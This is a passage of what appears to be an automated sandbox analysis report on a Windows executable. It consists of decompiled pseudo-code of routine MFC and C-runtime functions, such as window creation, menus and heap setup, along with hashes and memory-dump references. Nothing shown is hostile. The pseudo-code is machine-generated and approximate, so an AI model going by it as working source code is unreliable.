                  0x00427566
                  0x00427569
                  0x00000000
                  0x00427569
                  0x00427564
                  0x00427515
                  0x00427515
                  0x00427517
                  0x00427518
                  0x0042751d
                  0x0042751d
                  0x00427581

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427509
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                    • Part of subcall function 004174FB: __EH_prolog3.LIBCMT ref: 00417502
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: a2ba922fec3a509855610a124be86bd10da9b05b45ef600987d0f7498414911b
                  • Instruction ID: ca7fd307f2be72a3752cab3f0bceb8ec595584913dc78adcf506fcae19c16127
                  • Opcode Fuzzy Hash: a2ba922fec3a509855610a124be86bd10da9b05b45ef600987d0f7498414911b
                  • Instruction Fuzzy Hash: 66018830604121D7DB10EB15C881BADB330BF00318FA085DAF5569B1D1CF7DAEC58B49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040492C, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E0040492C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t25;
				struct HWND__* _t26;
				struct HWND__* _t28;
				void* _t35;
				void* _t36;

				_t36 = __eflags;
				_push(0x14);
				_push(0x45b0a0);
				E00431818(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t35 - 0x20)) = 0;
				_t25 = E0041EAD7( *((intOrPtr*)(E0041F363(0, __edi, __esi, _t36) + 0x80)), _t35 - 0x20);
				 *((intOrPtr*)(_t35 - 0x24)) = _t25;
				 *(_t35 - 0x1c) = 0;
				if(_t25 != 0) {
					 *((intOrPtr*)(_t35 - 4)) = 0;
					_t26 = CreateWindowExA( *(_t35 + 8),  *(_t35 + 0xc),  *(_t35 + 0x10),  *(_t35 + 0x14),  *(_t35 + 0x18),  *(_t35 + 0x1c),  *(_t35 + 0x20),  *(_t35 + 0x24),  *(_t35 + 0x28),  *(_t35 + 0x2c),  *(_t35 + 0x30),  *(_t35 + 0x34)); // executed
					 *(_t35 - 0x1c) = _t26;
					 *((intOrPtr*)(_t35 - 4)) = 0xfffffffe;
					E004049A6(0);
					_t28 =  *(_t35 - 0x1c);
				} else {
					_t28 = 0;
				}
				return E0043185D(_t28);
			}








                  0x0040492c
                  0x0040492c
                  0x0040492e
                  0x00404933
                  0x0040493a
                  0x0040494c
                  0x00404951
                  0x00404954
                  0x00404959
                  0x0040495f
                  0x00404986
                  0x0040498c
                  0x0040498f
                  0x00404996
                  0x0040499b
                  0x0040495b
                  0x0040495b
                  0x0040495b
                  0x004049a3

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  • Opcode ID: 87500ae70025976bd9bfe52f2e7f2fc3dad7a477c7413be53226d0db631e77ba
                  • Instruction ID: 904469578396c1f20cc798ad30f63f77ac122cb8e5fcb475f2898160d20664ef
                  • Opcode Fuzzy Hash: 87500ae70025976bd9bfe52f2e7f2fc3dad7a477c7413be53226d0db631e77ba
                  • Instruction Fuzzy Hash: 2E01A57280020DAFCF41AFE5CD419DE7B71FF0C318F50452AFA6461161D3398961AF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F720, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F720(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* __esi;
				void* __ebp;
				void* _t10;
				long _t11;
				void* _t15;
				void* _t16;
				struct HWND__* _t18;

				if(_a8 != 0x360) {
					_t18 = _a4;
					_t10 = E0040EE68(_t15, _t16, _t18, __eflags, _t18);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
						L6:
						return _t11;
					}
					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
					if(__eflags != 0) {
						goto L5;
					}
					_t11 = E0040F62D(__ebx, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
					goto L6;
				}
				return 1;
			}










                  0x0040f72c
                  0x0040f734
                  0x0040f738
                  0x0040f73d
                  0x0040f73f
                  0x0040f758
                  0x0040f762
                  0x0040f768
                  0x00000000
                  0x0040f768
                  0x0040f741
                  0x0040f744
                  0x00000000
                  0x00000000
                  0x0040f751
                  0x00000000
                  0x0040f751
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d53a845ea2ef5ea88e74bd1e4636f6f16ed949d4002cb73aa3a6d923430378a0
                  • Instruction ID: 2fdbec0b4a9ad72505348fdeb0c78ac9bbf9b9846fb0107a17cd17812a59923d
                  • Opcode Fuzzy Hash: d53a845ea2ef5ea88e74bd1e4636f6f16ed949d4002cb73aa3a6d923430378a0
                  • Instruction Fuzzy Hash: 6BF08232000119FBCF226FA18D048DB3BA9FF08351F008436FA14A2450C379C525DBAB
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00408BCA, Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00408BCA(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _t6;
				intOrPtr* _t16;

				_t16 = __ecx;
				_t6 = E0040ED96(__ecx, __eflags);
				if(_t6 != 0xffffffff) {
					_t6 =  *((intOrPtr*)( *_t16 + 0x174))(_a4, _a8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L1;
					}
					PostMessageA( *(_t16 + 0x20), 0x362, 0xe001, 0); // executed
					 *((intOrPtr*)( *_t16 + 0x150))(1);
					__eflags = 0;
					return 0;
				}
				L1:
				return _t6 | 0xffffffff;
			}





                  0x00408bd0
                  0x00408bd2
                  0x00408bda
                  0x00408beb
                  0x00408bf1
                  0x00408bf3
                  0x00000000
                  0x00000000
                  0x00408c04
                  0x00408c10
                  0x00408c16
                  0x00000000
                  0x00408c16
                  0x00408bdc
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 518b6bc56b42b1954addd32922aee5ef2c76ca411e4787bcdaa7cdbfe747cad4
                  • Instruction ID: 84aef6605057a435e7b508d2a4ac3e57ad12db9fb388b43368d2a12da25d0cd9
                  • Opcode Fuzzy Hash: 518b6bc56b42b1954addd32922aee5ef2c76ca411e4787bcdaa7cdbfe747cad4
                  • Instruction Fuzzy Hash: D1F0A030344600ABDB211B758C09F9A7BA5FF49731F110A3AF9A5AA2E1CAB6D8508A45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004074CB, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004074CB(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _t12;
				signed char _t14;
				signed char* _t17;

				_t17 = __ecx + 0x84;
				_t14 =  *_t17;
				 *_t17 = _t14 & 0xfffff0ff; // executed
				_t12 = E0042143D(__ecx, _a4); // executed
				 *_t17 = _t14;
				if((_t14 & 0x00000004) != 0) {
					_t12 = _a4;
					if(( *(_t12 + 0x18) & 0x00000001) == 0) {
						return InvalidateRect( *(__ecx + 0x20), 0, 1);
					}
				}
				return _t12;
			}






                  0x004074d8
                  0x004074de
                  0x004074e7
                  0x004074e9
                  0x004074ee
                  0x004074f3
                  0x004074f5
                  0x004074fc
                  0x00000000
                  0x00407505
                  0x004074fc
                  0x0040750f

                  APIs
                    • Part of subcall function 0042143D: DefWindowProcA.USER32(?,00000046,00000000,?,?,?), ref: 00421454
                    • Part of subcall function 0042143D: GetWindowRect.USER32 ref: 0042146C
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 004214AC
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 004214BB
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 004214D2
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 004214E1
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 00421512
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 0042151D
                    • Part of subcall function 0042143D: SetRect.USER32 ref: 00421534
                    • Part of subcall function 0042143D: InvalidateRect.USER32(?,?,00000001), ref: 0042153F
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00407505
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 9a21fad790aa2c19dd04905c127bbca1332fb62e91397c7549314257c2d1ffd5
                  • Instruction ID: a7cd9ca6abd962d82728a90d354626cd2234a4d826fdd58f6502a378ddc358a9
                  • Opcode Fuzzy Hash: 9a21fad790aa2c19dd04905c127bbca1332fb62e91397c7549314257c2d1ffd5
                  • Instruction Fuzzy Hash: BEF0A0B2204205BBC7215F19DC85FC2BFA4EF54360F24012AF694572A1C776A880C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404CB4, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404CB4(intOrPtr* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr* _t20;

				_t20 = __ecx;
				_t6 = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) == 0) {
					_t6 = E004049DB(_t9, GetMenuItemCount( *( *((intOrPtr*)( *__ecx + 0x6c))() + 4)));
				}
				return  *((intOrPtr*)( *_t20 + 0x194))(_a4, _t6);
			}





                  0x00404cba
                  0x00404cbc
                  0x00404cc1
                  0x00404cd9
                  0x00404cde
                  0x00404cef

                  APIs
                  • GetMenuItemCount.USER32 ref: 00404CCE
                    • Part of subcall function 004049DB: GetSubMenu.USER32 ref: 004049E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$CountItem
                  • String ID:
                  • API String ID: 3435231853-0
                  • Opcode ID: ecc52130dda57000e9a2f394a1279dd2f42cfe611a84272c04a69c5f37652895
                  • Instruction ID: 2bd0770f7da49b8842ae51bb064b07c5258a274e3421cbc5c2ea82824ae108bd
                  • Opcode Fuzzy Hash: ecc52130dda57000e9a2f394a1279dd2f42cfe611a84272c04a69c5f37652895
                  • Instruction Fuzzy Hash: 35E06D72200104AFD7106B25C808C7ABBAAEF94321301403BF949C3210CB349C529B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041481D, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041481D(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				void* __edi;
				intOrPtr* _t11;
				void* _t13;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t18;

				_t18 = _a4;
				_t17 = __ecx;
				if(_t18 >= 0) {
					_t11 = E0043108C(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
					if(_t11 == 0) {
						goto L1;
					}
					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
					 *_t11 = _t17;
					 *((intOrPtr*)(_t11 + 0xc)) = 1;
					 *((intOrPtr*)(_t11 + 8)) = _t18;
					return _t11;
				}
				L1:
				return 0;
			}









                  0x00414823
                  0x00414827
                  0x0041482b
                  0x0041483c
                  0x00414844
                  0x00000000
                  0x00000000
                  0x00414846
                  0x0041484a
                  0x0041484c
                  0x00414853
                  0x00000000
                  0x00414853
                  0x0041482d
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _malloc
                  • String ID:
                  • API String ID: 1579825452-0
                  • Opcode ID: dd6bd1b736eb428f6ac66092488aa0dafb57e017dd4b37dcf2df1ae9fd136421
                  • Instruction ID: af9e8d2a6ecd8cac88a5fa1c94de59ea43d9a8c68d6b0a2cc1d4c79a81d680ff
                  • Opcode Fuzzy Hash: dd6bd1b736eb428f6ac66092488aa0dafb57e017dd4b37dcf2df1ae9fd136421
                  • Instruction Fuzzy Hash: 34E06D765006169BC7009F4AD504A86BBECEFA1375F16846BE408CB662C675E885CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040547D, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040547D(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t5;
				void* _t13;
				intOrPtr _t14;
				intOrPtr* _t16;

				_t16 = __ecx;
				_t5 = E0040ED96(__ecx, __eflags);
				if(_t5 != 0) {
					_t14 = _a4;
					 *((intOrPtr*)( *_t16 + 0x64))(_t14, _t13);
					SetWindowLongA( *(_t16 + 0x20), 0xffffffec,  *(_t14 + 0x2c)); // executed
					return 1;
				}
				return _t5;
			}







                  0x00405483
                  0x00405485
                  0x0040548c
                  0x00405491
                  0x00405497
                  0x004054a2
                  0x00000000
                  0x004054ab
                  0x004054ae

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LongWindow
                  • String ID:
                  • API String ID: 1378638983-0
                  • Opcode ID: 5db1cf8e091e2c8a437a7c27e64b2570dcc467992d3ac8b88cd9058fe1aa6147
                  • Instruction ID: 810bde46e47805890040c907d9e550c609abfaacfc61c2af389d08159f719c5e
                  • Opcode Fuzzy Hash: 5db1cf8e091e2c8a437a7c27e64b2570dcc467992d3ac8b88cd9058fe1aa6147
                  • Instruction Fuzzy Hash: 2AE086332101146BC7106BAADC04C4BBFADEFEA3317050537F655D3161CA75D8118B94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040451B, Relevance: 1.5, APIs: 1, Instructions: 20windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040451B(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t15;

				_t15 = __ecx;
				_t7 = E0040ACDF(_t11, __ecx, _t13, _t14, __ecx, __eflags, _a4, _a8, _a12, _a16); // executed
				if(_t7 != 0) {
					 *((intOrPtr*)(_t15 + 0x5c)) = GetMenu( *(__ecx + 0x20));
					return 1;
				}
				return _t7;
			}










                  0x00404524
                  0x0040452f
                  0x00404536
                  0x00404541
                  0x00000000
                  0x00404546
                  0x00404549

                  APIs
                    • Part of subcall function 0040ACDF: __EH_prolog3.LIBCMT ref: 0040ACE6
                  • GetMenu.USER32(?), ref: 0040453B
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Menu
                  • String ID:
                  • API String ID: 3706238695-0
                  • Opcode ID: 66df6734f36cd05d173709c3a8e51ce962251809194cf71b69e651ed303963b6
                  • Instruction ID: e77aef2fb446fdbe468449979d8eaaa0d22de51c12c1053e944ad6392ff2d827
                  • Opcode Fuzzy Hash: 66df6734f36cd05d173709c3a8e51ce962251809194cf71b69e651ed303963b6
                  • Instruction Fuzzy Hash: 2CE0EC36400258BFDB119F62DC048AB7FAAFF45365B05443AB95992160E772D830EB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043ABB6, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0043ABB6(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x466eac = _t6;
				if(_t6 != 0) {
					 *0x468784 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                  0x0043abcb
                  0x0043abd1
                  0x0043abd8
                  0x0043abdf
                  0x0043abe5
                  0x0043abdb
                  0x0043abdb
                  0x0043abdb

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0043ABCB
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 397268e2361d87a014e1d1895c26ec71cdc79384a3b682af9213abaf7b095825
                  • Instruction ID: adcfc2ec59f8131cad79dbeede6f75f469dde3a6a742d11a41e180f43ac4c6ee
                  • Opcode Fuzzy Hash: 397268e2361d87a014e1d1895c26ec71cdc79384a3b682af9213abaf7b095825
                  • Instruction Fuzzy Hash: A5D0A7766903485EEB105F71BC08B233BDCD384795F144436FA0CC6190F6F5D550EA09
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00430AD2, Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00430AD2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t9;
				void* _t18;

				_push(0xc);
				_push(0x45de98);
				E00431818(__ebx, __edi, __esi);
				E004339CB();
				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
				_t9 = E004309E7(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
				 *(_t18 - 4) = 0xfffffffe;
				E00430B08();
				return E0043185D( *((intOrPtr*)(_t18 - 0x1c)));
			}





                  0x00430ad2
                  0x00430ad4
                  0x00430ad9
                  0x00430ade
                  0x00430ae3
                  0x00430aea
                  0x00430af0
                  0x00430af3
                  0x00430afa
                  0x00430b07

                  APIs
                    • Part of subcall function 004339CB: __lock.LIBCMT ref: 004339CD
                  • __onexit_nolock.LIBCMT ref: 00430AEA
                    • Part of subcall function 004309E7: __decode_pointer.LIBCMT ref: 004309F6
                    • Part of subcall function 004309E7: __decode_pointer.LIBCMT ref: 00430A06
                    • Part of subcall function 004309E7: __msize.LIBCMT ref: 00430A24
                    • Part of subcall function 004309E7: __realloc_crt.LIBCMT ref: 00430A48
                    • Part of subcall function 004309E7: __realloc_crt.LIBCMT ref: 00430A5E
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A70
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A7E
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A89
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                  • String ID:
                  • API String ID: 1316407801-0
                  • Opcode ID: a216f9923c9975a0f317412ad0bce5b59f46745d06f6589707a2665974790f42
                  • Instruction ID: 6d8d4708de4b9a91417e96c5bd7686bfa658171a6882dda3d32428defeeee52c
                  • Opcode Fuzzy Hash: a216f9923c9975a0f317412ad0bce5b59f46745d06f6589707a2665974790f42
                  • Instruction Fuzzy Hash: 27D017B1841204EADB10BBAACC0378DBA60AF49319F60921EB021660E2CB7C1A018B0D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00412C34, Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00412C34(void* __ecx, int _a4) {
				int _t7;

				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x50)))) + 0xa0)));
				}
				_t7 = ShowWindow( *(__ecx + 0x20), _a4); // executed
				return _t7;
			}




                  0x00412c3d
                  0x00412c55
                  0x00412c55
                  0x00412c45
                  0x00412c4c

                  APIs
                  • ShowWindow.USER32(?,?,?,004050C1,00000001), ref: 00412C45
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ShowWindow
                  • String ID:
                  • API String ID: 1268545403-0
                  • Opcode ID: c4bc1a37b7502a52d234633a370e0309815108f442178a029fe1d30a7837fec8
                  • Instruction ID: b808e145f8c4c1f72aae7c75721f5196043c7ac8eaefe8ca5c15e3459cb75938
                  • Opcode Fuzzy Hash: c4bc1a37b7502a52d234633a370e0309815108f442178a029fe1d30a7837fec8
                  • Instruction Fuzzy Hash: 33D05E36100648DFC7048B00D508BB537A5FB54315F5000A9E5080E532C7339862CB44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004085AB, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E004085AB(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v20;
				intOrPtr _t8;
				void* _t9;
				intOrPtr _t15;
				intOrPtr _t19;

				_t21 = __esi;
				_t20 = __edi;
				_t18 = __ecx;
				_t17 = __ebx;
				_t8 =  *((intOrPtr*)(__ecx + 0xd4));
				if(_t8 != 1) {
					__eflags = _t8 - 2;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(__ecx + 0xd8)));
						goto L8;
					} else {
						_push(__ecx);
						_v8 = 0x462598;
						E00430CF4( &_v8, 0x45b30c);
						asm("int3");
						_push(4);
						E00431A9B(E0044AC81, __ebx, __edi, __esi);
						_t19 = E00420529(0x104);
						_v20 = _t19;
						_t15 = 0;
						_v8 = 0;
						if(_t19 != 0) {
							_t15 = E0041EC43(_t19);
						}
						return E00431B73(_t15);
					}
				} else {
					_push(GetMenu( *(__ecx + 0x20)));
					L8:
					_t9 = E0041F4E8(_t17, _t18, _t20, _t21, __eflags); // executed
					return _t9;
				}
			}









                  0x004085ab
                  0x004085ab
                  0x004085ab
                  0x004085ab
                  0x004085ab
                  0x004085b4
                  0x004085c2
                  0x004085c5
                  0x004085cc
                  0x00000000
                  0x004085c7
                  0x0040643b
                  0x00406445
                  0x0040644c
                  0x00406451
                  0x00406452
                  0x00406459
                  0x00406468
                  0x0040646a
                  0x0040646d
                  0x0040646f
                  0x00406474
                  0x00406476
                  0x00406476
                  0x00406480
                  0x00406480
                  0x004085b6
                  0x004085bf
                  0x004085d2
                  0x004085d2
                  0x004085d7
                  0x004085d7

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu
                  • String ID:
                  • API String ID: 3711407533-0
                  • Opcode ID: 7a8d6883986902a76e0a4b941a5239b94e62478ace76e4674834ef28fa068524
                  • Instruction ID: 212a02c67525b04f8061536d9f402557b92849d6adee2e2fba0ca1320a023372
                  • Opcode Fuzzy Hash: 7a8d6883986902a76e0a4b941a5239b94e62478ace76e4674834ef28fa068524
